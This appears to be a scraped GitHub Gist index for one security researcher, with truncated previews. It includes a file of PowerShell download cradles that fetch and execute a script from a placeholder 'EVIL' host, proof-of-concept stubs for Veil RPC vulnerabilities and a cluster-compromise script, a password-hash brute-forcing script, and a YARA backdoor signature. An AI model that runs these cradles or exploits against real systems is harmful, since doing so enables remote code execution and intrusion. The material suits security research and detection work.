Skip to content

Instantly share code, notes, and snippets.

Brian Wallace bwall

Block or report user

Report or block bwall

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@bwall
bwall / Comparing RF and CNN Adversarial Samples.ipynb
Last active Jun 9, 2018
Comparing RF and CNN Adversarial Samples
View Comparing RF and CNN Adversarial Samples.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View [Work in Progress] Ashes.ipynb
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@bwall
bwall / brute_force_hash_encoding.py
Created Jun 6, 2016
Attempt to brute force the hashing/encoding methods for stored passwords
View brute_force_hash_encoding.py
from hashlib import sha1, sha256, sha224, sha384, sha512, md5
from base64 import b64encode, b32encode
digest = "894b186bf79d4337c4f44140a2ec12b42d13a79f".decode("hex")
hexdigest = "894b186bf79d4337c4f44140a2ec12b42d13a79f"
methods = {
"encode_hex": lambda x: x.encode("hex"),
View Julia_Full_Cluster_Compromise.py
import socket
import time
import struct
from random import randint
TCP_IP = "172.16.195.169"
TCP_PORT = 9009
def send_payload(packet):
View exploit_veil_msfvenom.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
View exploit_veil_pescrambler.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
View exploit_veil_hyperion.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
@bwall
bwall / pocs.py
Last active Apr 1, 2016
Proof of concepts for recently released Veil RPC vulnerabilities
View pocs.py
import socket
import json
def send_command(command, ip="127.0.0.1", port=4242):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
print json.dumps(command)
s.send(json.dumps(command))
s.close()
View operation_dust_storm.yara
rule Misdat_Backdoor_Packed
{
meta:
author = "Cylance SPEAR Team"
note = "Probably Prone to False Positive"
strings:
$upx = {33 2E 30 33 00 55 50 58 21}
$send = {00 00 00 73 65 6E 64 00 00 00}
$delphi_sec_pe = {50 45 00 00 4C 01 03 00 19 5E 42 2A}
You can’t perform that action at this time.